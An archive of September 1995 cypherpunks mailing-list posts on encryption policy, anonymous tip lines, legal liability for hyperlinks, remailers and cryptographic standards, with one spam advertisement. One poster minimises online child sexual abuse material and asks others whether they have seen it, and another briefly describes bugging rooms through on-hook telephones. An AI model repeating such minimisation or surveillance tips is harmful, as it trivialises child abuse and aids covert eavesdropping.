Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Andrew Loewenstern writes:

<snip>

>Encryption prevents 'fishing expeditions' and  
>unauthorized monitoring;  this is what the LEAs don't want to admit.

AMEN, Andrew.

Another thing the LEAs don't want to admit is the incredible (cost
and otherwise) effectiveness of the "Honey Trap" (SEX!) when used
by (or against) them. Cash isn't the only way to recruit another
Aldrich Ames(sp?), and sex is a lot easier to launder. <g>
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMFh3P21lp8bpvW01AQGiawP/RbB0VL2wQ4zp712EEHt3IKz+HQpM8rjY
KXXMMTdMpryBX2pWZRxm82ewYwiSwI2U+Ij67jQ+9Ev2/S1WgVCiV+se05oZ8n85
QkWI182G+Bk4JJ46/LwBDFos8gp9WRYCoRVFgA5SmV92r05MpPnrtzNUCG31D8vd
FsB+JDwnZQ8=
=rUVo
-----END PGP SIGNATURE-----
Regards, Jim Ray

"When making public-policy decisions for the government, I think one
should ask oneself which technologies would best strengthen the hand
of a police state. Then, do not allow the government to deploy those
technologies."  -- Phillip Zimmermann, talking to himself. (Congress
sure-as-hell wasn't paying attention!)
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 14 Sep 95 07:51:56 PDT
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: An opportunity not to be missed
Message-ID: <Pine.3.89.9509141521.A20169-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Frank Stuart wrote:

> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
> use through the remailers)?  You could set up a web-page with instructions
> and a list of crimes for which there are rewards.

Someone already tried that. The cops got a copy of the WWW logs and 
started investigating everyone who'd looked at the WWW page... So at the 
least you'd need a bunch of anonymous WWW proxies as well.

There's also the problem that the current ecash systems do not provide 
payee anonymity, so if you pay informers with ecash they can be traced if 
the bank and payer collude.

		Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 14 Sep 95 13:58:33 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <v01510107ac7db81f6880@[198.59.115.127]>
Message-ID: <Pine.SUN.3.91.950914165321.24774A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 14 Sep 1995, Dar Scott wrote:

> Black Unicorn wrote,

[...]

> >> Perhaps, I could have use the phrases "non-coercion-based" licensing and
> >> "coercion-based" licensing, but I am not comfortable with these--trade
> >> licensing invokes too violent of an image.
> >
> >I think this construction is still flawed.  I will remain by my position
> >that licensing is useful when not used to collect taxes or
> >otherwise overregulate.  I also hold that the distinctions you make
> >between licensing and certification are without functional difference in
> >effect and are deceptive in that they suggest a significant difference in
> >effect or purpose where there is none.
> >
> The difference in effect is in emergent market optimization.  The
> difference in purpose is ethical.
> 
> I have learned that you--and perhaps others--do not see an important
> difference in these two styles of influencing behavior.  I see a major
> difference and in thinking the difference was obvious was slow in
> understanding your position.

I think I understand your position now.

To me there is little difference in how one is persuaded against one's 
will.  Certainly I dislike violence, but some of the "persuasive" methods 
in a market economy sicken me just as much as force might.

In any event, your construction makes sense to me, even if I do not find 
it useful myself.

> Great.  You're already enjoying breakfast and I still have to go to bed.

I hate time zones.

> Dar
> 
> ===========================================================
> Dar Scott               Home phone: +1 505 299 9497
> 
> Dar Scott Consulting         Voice: +1 505 299 5790
> 8637 Horacio Place NE        Email: darscott@aol.com
> Albuquerque, NM  87111              dsc@swcp.com
>                                Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 14 Sep 95 14:01:27 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Crimestoppers anon tip mailbox
In-Reply-To: <199509141913.MAA08819@infinity.c2.org>
Message-ID: <199509142101.RAA23535@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mark writes:
# Someone already tried that. The cops got a copy of the WWW logs and
# started investigating everyone who'd looked at the WWW page...

sameer writes:
[re: the kidnapped-child info Web page]
> 	How did they get the logs? Did they have a court order?

No. The owner of the Web page voluntarily offered the logs when asked by the
local police.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janet.dove@ledip.py (Janet Dove)
Date: Fri, 15 Sep 95 13:00:37 PDT
Subject: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Titles
Message-ID: <janet.dove-1409951749170001@pm1-64.ixc.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi fellow 'netters,

My name is Janet Dove and I recently started using a magazine subscription
club in the USA that has a FREE 1 yr. magazine subscription deal with your
first paid order- and I have been very pleased with them.    They have
over 1,500 different USA titles that they can ship to any country on a
subscription basis.   As for computer magazines from the USA, they more of
a selection than I ever knew even existed.  They have magazines for most
every area of interest in their list of 1,500 titles.

Within the USA, for their USA members, they are cheaper than all their
competitors and even the publishers themselves.  This is their price
guarantee.

Overseas, on the average, they are generally around one-fourth to one-half
of what the newstands overseas charge locally for USA magazines.  On some
titles they are as little as one-tenth of what the newstands charge.  They
feel that mgazines should not be a luxury overseas.   In the USA, people
buy magazines and then toss them after reading them for just a few minutes
or hours.  They are so cheap in the USA!   Well, this company would like
to make it the same way for their overseas members.  They are also cheaper
than all their competitors in the USA and overseas, including the
publishers themselves!   This is their price guarantee.  Around one-half
their business comes from overseas, so they are very patient with new
members who only speak limited English as a 2nd language.

Their prices are so cheap because they deal direct with each publisher and
cut-out all the middlemen.


They will send you their DELUXE EMAIL CATALOGUE (around 400K-big and
juicey) !)...if you completely fill out the form below.  It has lists of
all the freebies, lists of all the titles they sell, titles broken down by
categories and detailed descriptions on nearly 1000 of the titles that
they sell.

Please do not email me as I am just a happy customer and a *busy*
student.  I don't have time to even complete my thesis in time, let alone
run my part-time software business!  Email them directly at:      
suzanne@grfn.org



*------------cut here-----------------------------------------------*
REQUEST FOR MORE INFO:  please copy this section only and email to:
                                        suzanne@grfn.org

            (sorry, but incomplete forms *cannot* be acknowledged)

Name:
Internet email address:
Smail home address:
City-State-Zip:
Country:
Work Tel. #:
Work Fax #:
Home Tel. #:
Home Fax #:
Name of USA mags you currently get on the newstand or in the store:
Name of USA mags you currently get on a subscription basis, through the mail:
Name of USA mags you would like price quotes on when we call you:
Catalogue format desired from below 2 choices (list "1" or "2"):
(1. 22-part email message;    2.  atttached file by email)

{{{Note-  22-part email can be received by anyone with any computer.
Attached file format may not be for you:  it is sent as an uncompressed
400K file formatted in Microsoft World text only format, on a Mac;  if you
don't use Microsoft Word on a Mac - you will have to know how to convert
into a usable text format.  We cannot help you with this.   If in doubt,
we suggest you go with the universally acceptable 22-part email message. 
You can always manually spend a few minutes pasting the parts into one
whole.}}}

If you saw this on a newsgroup, which newsgroup did you see it on?:

How did you hear about us (name of person who referred you or the area of
the internet that you saw us mentioned in):   Janet Dove 
091495
*------------cut here-----------------------------------------------*



They guarantee to beat all their competitors' prices. Sometimes they are
less than half of the next best deal I have been able to find and other
times, just a little cheaper - but I have never found a lower rate yet. 
They assured me that if I ever do, they will beat it.  

They have been very helpful and helped me change my address from the USA
to Finland and then back again when I moved last month.  They are very
knowledgeable about addressing mags worldwide.

They have a deal where you can get a free 1 yr. sub to a new magazine from
a special list of over 300 popular titles published in the USA.   They
will give you this free 1 yr. sub when you place your first paid order
with them to a renewal or new subscription to any of the over 1,500
different popular USA titles they sell.  

They can arrange delivery to virtually any country and I think they have
clients in around 35 or 36 countries now.  Outside the USA there is a
charge for foreign postage and handling (on both paid and freebie subs)
that varies from magazine to magazine.  I have found their staff to be
very friendly and courteous.  They even helped me with an address change
when I moved from one country to another.
 
The owner thinks of his service as a "club" and his clients as "members"
(even though there is no extra fee to become a member - your first
purchase automatically makes you a member) and he is real picky about who
he accepts as a new member.   When he sets you up as a new member, he
himself calls you personally on the phone to explain how he works his
deal, or sometimes he has one of his assistants call.  He is kind of
quirky sometimes - he insists on setting up new members by phone so he can
say hi to everyone (I sure wouldn't want to have his phone bills!),  but
you can place future orders (after your first order) via E-mail.   

He has some really friendly young ladies working for him, who seem to know
just as much as he does about this magazine stuff.  If you live overseas,
he will even call you there, as long as you are interested, but I think he
still makes all his overseas calls on the weekends, I guess cause the long
distance rates are cheaper then.  

He only likes to take new members from referrals from satisfied existing
members and he does virtually no advertising.  When I got set-up, they had
a 2-3 week waiting list for new members to be called back so that they
could join up. (Once you are an existing member, they help you immediately
when you call. )  I think they are able to get back to prospective new
members  the same day or within a few days now, as they have increased
their staff.  I am not sure about this.........but if you email the above
form to them, that is the way to get started!

They will send you some FREE info. via E-mail (the short version (around
40K) of their catalogue, or if you request it the DELUXE LONG VERSION
(around 400K-big and juicey) !)...if you fill out the form near the top of
this message.

They then send you email  that outlines how his club works and the list of
free choices that you can choose from, as well as the entire list of what
he sells;  and then they will give you a quick (3-5 minute) friendly,
no-pressure no-obligation call to explain everything to you personally and
answer all your questions.

Once you get in, you'll love them. I do.  For more info,  just fill out
the form near the top of this message and email it to:      
suzanne@grfn.org


Sincerely,

Janet Dove




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joseph@genome.wi.mit.edu (Joseph Sokol-Margolis)
Date: Thu, 14 Sep 95 14:55:32 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <v02130501ac7e53505548@[18.157.1.107]>
MIME-Version: 1.0
Content-Type: text/plain


>>And Duncan's specific point remains:
>>
>>-- is it a violation of pornography laws (perhaps campus rules) to have a
>>home page with links to URLs containing pornographic images?
>>
>>-- is it a violation of _child pornography_ laws to have a home page with
>>links to URLs containing child pornography images? (The URLs could be
>>offshore, perhaps in jurisdictions where the age of consent is much
>>different than in the U.S., e.g., Denmark or Thailand.)
>>
>>-- is it a violation of national security laws to have a home page with
>>links to URLs containing national defense secrets? (The URLs could be
>>offshore.)
>>
>>-- is it a violation of copyright/patent laws to have home pages with
>>pointers to protected material? (Songs, written works, images, inventions,
>>etc.)
>>
>>And so on....

Here's my question, and a thought to ponder: If it is/becomes illegal to
have links on a homepage to pornography because it is ruled as the same as
having the pornography there; then can you have links to pages with links
(the same as having it) to pornography? This repeats, so would it be legal
to links at all?

--------------------------------------------------------------------------------
Joseph Sokol-Margolis                                   joseph@genome.wi.mit.edu
Assistant Systems Administrator                                     seph@mit.edu
Whitehead Institute/MIT
Center for Genome Research                                 phone: (617) 252-1922
One Kendall Sq. Bldg. 300                                    fax: (617) 252-1902
Cambridge, MA 02139-1561
----------------------http://www-genome.wi.mit.edu/~joseph/-----------------
----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Thu, 14 Sep 95 17:09:33 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <v01510101ac7e7081b71f@[198.59.115.134]>
MIME-Version: 1.0
Content-Type: text/plain


Suppose we interpret Linking = Showing as

For all web pages x and y,
Showing(x) and  Linkto(x,y) --> Showing(y)

Meaning:  In all cases, if a page is being shown and it links to another
page, then the other page is being shown.

With this kind of transitivity I would not be surprised if a third of the
web sites are showing pornography.

For example (made up titles!), Transitors --> Electronics Distributers -->
Ray's TV --> Springfield Businesses --> Bob's Photography --> Plenty
Pictures --> Photography Resources --> Asian, Female --> World Nudity -->
John's Porno Shop.  The poor guy trying to be helpful to those learning
electronics now has a pornopage.

Perhaps some kind of fuzzy logic could apply.  If one believes in such a
thing.

I wonder if I have a pornopage.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Thu, 14 Sep 95 16:39:21 PDT
To: joseph@genome.wi.mit.edu
Subject: Re: Linking = Showing = Transferring?
Message-ID: <199509142338.SAA10960@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


[...]
>Here's my question, and a thought to ponder: If it is/becomes illegal to
>have links on a homepage to pornography because it is ruled as the same as
>having the pornography there; then can you have links to pages with links
>(the same as having it) to pornography? This repeats, so would it be legal
>to links at all?
[...]

And then there's the problem of URLs not being static.  What may be a perfectly
innocuos link one day may turn into something not perceived as harmless the
next.  I seem to recall reading about a French site (Femmes Femmes Femmes)
that offered pictures of nude females.  When the traffic got too much for
them, they jokingly changed the links to point to pictures at the Louvre.
However, it could just as easily happen the other way.

I also heard something about the ACM taking the position that a URL was not
equivalent to the work itself, but I don't have a reference.


Frank Stuart              | (Admiral Grace) Hopper's Law:
fstuart@vetmed.auburn.edu | It's easier to get forgiveness than permission. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 14 Sep 95 15:57:37 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
Message-ID: <199509142253.SAA63671@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis wrote:

<snip>

>Just wondering about liability issues after state accrediting is dead.

<snip>

<I can resist jumping in no longer...>

Despite loud squawking, "chaos" will not ensue. Instead, the private
sector will take over assesing risk, which it has always done better.

An example: I'd rather jump into a full bathtub with a plugged-in,
UL [Underwriter's Laboratories] certified TV set than take the FDA
approved (but very dangerous, IMO) prostate drug called "Proscar."
While there is only one UL (by choice, not force) and only one FDA
(by force, not choice) I can easily imagine a  lawyer-certifying
companies like UL for appliances, probably tied [like UL] to the
insurance industry. [I am not a lawyer, or a doctor either.]
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMFiyw21lp8bpvW01AQGWmQP/QrIwiASIcwWZ6T6mcg7lB+BknBzlgBjy
IXMdTalqk5gepHhO386QiA4XNdhlBtaJWpOCQkqRu4M7MrSlCZBuPTNgyu5DJRNS
Ru7X/XVWzCKrODWGg8o45GblveNQker7XOJp6v5cmU5xyo2hZNvwZlPb4jq2fWou
wW/Amy49BNA=
=Nbil
-----END PGP SIGNATURE-----
Regards, Jim Ray

"When making public-policy decisions for the government, I think one
should ask oneself which technologies would best strengthen the hand
of a police state. Then, do not allow the government to deploy those
technologies."  -- Phillip Zimmermann, talking to himself. (Congress
sure-as-hell wasn't paying attention!)
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Thu, 14 Sep 95 17:00:16 PDT
To: "cypherpunks@toad.com>
Subject: Re: <SAFER SK-xx>
Message-ID: <199509150009.TAA09893@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: David E. Smith * EMC.Ver #2.5.02 ] --

> /* SAFER SK-128 designed by James L. Massey who did not do this
>    conversion and is not responsible for any bugs in it.
> 
>    This a 'C' conversion of the reference Turbo Pascal implementation

Does anyone out there have a pointer to the "Turbo Pascal implementation?"

(Or the code itself?)

Reply to me, not the list; there's quite enough spam as it is.


--
David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO 63701-4745
(314)339-3814, dsmith@midwest.net, PGP ID 0x92732139
Opinions are mine (though I often claim demonic possession)
http://www.midwest.net/scribers/dsmith/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Thu, 14 Sep 95 17:58:50 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <v01510102ac7e786c9378@[198.59.115.134]>
MIME-Version: 1.0
Content-Type: text/plain


Whoops!  I mentioned the "linking to a page that links to a page..."
problem without noticing that Joseph Sokol-Margolis had already brought it
up.

Maybe pornography is not in the page (or resource) but in the browser.  For
example, I have a "pornography enabled" browser, because I can use it to
access pornopages.  What if I set up a browser for my child that saw a
smaller view of the net that did not include pornopages.  That browser
would not be "pornography enabled".  The limited view could be created from
some combination of lists of OK sites & pages, lists of off-limits sites &
pages, and certification requirements for those in between (virtual OK
lists).  I have seen the off-limits lists in association with some blocking
products.

Frank Stuart wrote,
>And then there's the problem of URLs not being static.  What may be a perfectly
>innocuos link one day may turn into something not perceived as harmless the
>next.

The blocking (off-limits) lists are then always behind and flawed.  Better
OK lists might be created by the list publisher having contractual
commitments from the site owner.  A virtual OK list publisher would publish
the key for verifying approved pages that have built-in certs.  This would
provide the better probability that the browser was not pornography
enabled.  A page would not show if it had been changed.  A problem to be
solved would be doing this with minimal psychological time costs to the
user.  Another is making sure that getting certs would not be such a pain
that only a few sites would be on the virtual OK list.

Of course, I would not want my kids under 10 to see certain ideological
pages and there might not be a market to justify certs.  I would have to
make my own list or get a cheap blocking list or something from the
major-group-with-same-ideological-bent-as-dar ftp site.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 14 Sep 95 16:26:27 PDT
To: owner-cypherpunks@toad.com
Subject: Re: NSA on GAK
Message-ID: <9509142325.AA06863@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>> Internet runs on software distributed over the Internet.

This is more like an aphorism than a true statement.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Sep 95 19:28:55 PDT
To: cypherpunks@toad.com
Subject: Re: Explaining Zero Knowledge to your children
Message-ID: <ac7de719050210049b11@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:18 PM 9/14/95, Hadmut Danisch wrote:
>There is a paper about explaining Zero Knowledge methods in simple
>words. It's titled "Explainig Zero Knowledge Authentication to your
>children" or something similar. It's said to be in the proceedings of
>any conference. Does anybody know where to find it?

Schneier describes the "cave" analogy in his book, on p. 85, and gives a
reference:

Quisquater, Guilou, Berson, "How to Explain Zero-Knowledge Protocols to
your Children," Advances in Cryptology--CRYPTO '89 Proceedings.

The paper is only a couple of pages long and would make a nice scan project
for someone, as it has no equations.

But Schneier is the easiest way to read up on it.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 14 Sep 95 18:05:25 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: GAK
In-Reply-To: <199509150055.UAA18048@book.hks.net>
Message-ID: <9509150104.AA03601@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
 > Most telephones can be used to monitor conversations in the room they are
 > installed in even while on-hook. No need to ever enter the premises. Just
 > drive it with AC.  Look at your basic telephone diagram and remember
 > Xc=1/(omega*C) from your AC circuits class.

The phrase "most telephones" may have been accurate when it meant "500
sets", but now that people generally own electronic phones I wonder
whether the lucky one's statement remains true.  (It might; I'm an
electronics ignoramus.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:09:16 PDT
To: cypherpunks@toad.com
Subject: Re: DD, pedaphiles, and Terrorists, oh my
Message-ID: <199509150006.UAA17827@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9509141640.AA30602@zorch.w3.org>, hallam@w3.org wrote:


>We never used to see kiddie porn on the internet. The net would go
balistic if a 
>picture of a teen age nude was posted. Recently there has been a flood of hard 
>core paedophile material.

There has always been nude teens on the net. The kind of pictures the most
casual observer can take at any Mediteranian beach at any given day in the
Summer. There is no real kiddy porn readily available on the net.  I
looked long and hard. Its a red herring.

ANYBODY on this list seen some real kiddy porn on the net? I am talking
intercourse, etc., not scans of six year olds from the Sears catalog, or
naked boys building sandcastles on the beach.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjDkioZzwIn1bdtAQEB0gF+M67Ih6WLAl8J9bxPZOBmyjxKsxUczpqv
th5x7ZuILyuf/+bFTtcLKwbOnzZkIfpJ
=pjLL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:13:32 PDT
To: cypherpunks@toad.com
Subject: Re: Child Porn, Morphing, and Pointers
Message-ID: <199509150010.UAA17856@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac7db05202021004bc61@[205.199.118.202]>, tcmay@got.net
(Timothy C. May) wrote:

>>If I'm reading this correctly, if I Photoshop a kids face onto the body
>>of the latest Playboy centerfold, I'm in violation of this proposed law?
>
>I believe there have already been prosecutions along these lines. For
>example, do you think a _comic book_ with child porn themes ("explicit"
>art, situations) would not be prosecuted as child porn?
>
>I strongly suspect that a _painting_ of a 7-year-old girl engaged in a sex
>act would result in a prosecution.

Any cites?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjEkSoZzwIn1bdtAQFO5gGAvKEwd8DuWbNAzMtkqQ4BCPrp5YAOWrcu
eSooY922jvZlXV+PYFcamevbR3mZ4bYj
=Jxeu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 14 Sep 95 11:19:32 PDT
To: cypherpunks@toad.com
Subject: Explaining Zero Knowledge to your children
Message-ID: <9509141818.AA05757@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



There is a paper about explaining Zero Knowledge methods in simple
words. It's titled "Explainig Zero Knowledge Authentication to your
children" or something similar. It's said to be in the proceedings of
any conference. Does anybody know where to find it?

Thanks
Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Thu, 14 Sep 95 12:44:21 PDT
To: cypherpunks@toad.com
Subject: Re: MOSS [IETF privacy-enhanced mail, modified for MIME] now available
In-Reply-To: <9509132335.AA05053@sulphur.osf.org>
Message-ID: <199509141944.UAA22502@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:

| >From pem-dev-request@neptune.tis.com Wed Sep 13 19:27:35 1995
| Message-Id: <9509132011.AA19261@tis.com>
| Reply-To: James M Galvin <tismoss-support@TIS.COM>
| To: "MOSS.Announce.List":;, tis.com@TIS.COM
| Subject: ANNOUNCE: TIS/MOSS Version 7.1

[...]

| 3
| Q: How does MOSS compare to PGP and PEM?
| 
| PGP can provide the same services but since it is not integrated with
| MIME the interpretation of the protected content is necessarily user
| controlled.  Note, however, that MIME can carry a PGP object.

Just wondering - is anyone working on a profile for PGP under MOSS
and/or the multipart/signed and multipart/encrypted body parts ?

Whether or not they are, it would be useful to have a de-facto
standard for the use of PGP with current MIME implementations.  I
recall there was a draft RFC by Nathaniel Borenstein which dealt
with this, but it was withdrawn to leave the way clear for MOSS ?

Why bother ?  Well, there are lots of mailers out there with "some"
MIME support - enough for launching a helper application to read
and perhaps compose (say) application/pgp, but not nearly enough to
handle MOSS.  I'm thinking about commercial offerings for the likes
of MacOS, DOS, and Windows in particular.  It seems like a really 
neat hack to use the MIME support to bring PGP in by stealth, but
perhaps most of the implementations Out There are too crippled ?

Over to you... :-)

Martin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ROBO Mixmaster Remailer <robo@c2.org>
Date: Thu, 14 Sep 95 20:57:55 PDT
To: mix-l@jpunix.com.cypherpunks@toad.com
Subject: RE: Mixmaster status
Message-ID: <199509150345.UAA16323@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Flame Remailer <remailer@flame.alias.net> wrote:

> Subject: Mixmaster status
>
>   There has been an offer to purchase and commercially develop Mixmaster.
>   This will hasten the development of Mixmaster for other platforms (e.g.
>   Dos, Windows  Macintosh), and bring significant improvements to the
>   interface, but I will not compromise on the level of security provided by
>   Mixmaster. Free client software will continue to be available.
>
>   This could be the big breakthrough for remailers, finally thrusting them
>   out of the hobbyist's closet into the corporate world.
>
> I wonder. Where is the commercial market for remailers? Who has an
> application for them except hobbyinst? Why would there be a commercial
> incentive to run a mixmaster server, or even a client?
>
> Could this "offer" be a red herring?

I wondered the same thing myself.  It would certainly be a more
cost-effective way for the NSA to compromise Mixmaster technology
than by brute force.

Consider this scenario ...  Mixmaster get's bought by the Acme
Crypto Company of Ft. Meade, MD.  They "improve" it, and offer a new
version.  It's even FREE (for non-commerical use)!  But their
"improvements" make it incompatible with previous versions, and so
you have to upgrade.  The new "commercial" version comes with no
SOURCE CODE, of course...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 14 Sep 95 17:47:42 PDT
To: cypherpunks@toad.com
Subject: Celco Sting
Message-ID: <199509150047.UAA05488@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


There's more on the cell-phone sting reported in the NYT 
Tuesday at:

   URL: gopher://justice2.usdoj.gov/00/usao/new_jersey/nj62.txt


[Snippet]

   Secret Service "Operation Cybersnare"


   Arrested late Friday were:

   "Chillin," "Led," "Alpha Bits," "Mmind," "Cellfone" and 
"Barcode."

   A computer "hacker" is an individual with expertise in 
gaining
   unauthorized entry into computer systems.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:50:12 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <199509150047.UAA18025@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02130501ac7e53505548@[18.157.1.107]>,
joseph@genome.wi.mit.edu (Joseph Sokol-Margolis) wrote:

>Here's my question, and a thought to ponder: If it is/becomes illegal to
>have links on a homepage to pornography because it is ruled as the same as
>having the pornography there; then can you have links to pages with links
>(the same as having it) to pornography? This repeats, so would it be legal
>to links at all?

The answer is trivial. If it pisses of the fascists in power enough, you
go to jail or get killed.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjNIyoZzwIn1bdtAQFtXQGAkgf19PR9xYU91knoFXfYCR5NaPyWCcPz
BfpmmPksdMUFCk73R4rMJIc+LruHQGb9
=2aYL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:57:32 PDT
To: cypherpunks@toad.com
Subject: Re: GAK
Message-ID: <199509150055.UAA18048@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9509141935.AA09315@argosy.MasPar.COM>, koontz@MasPar.COM
(David G. Koontz) wrote:


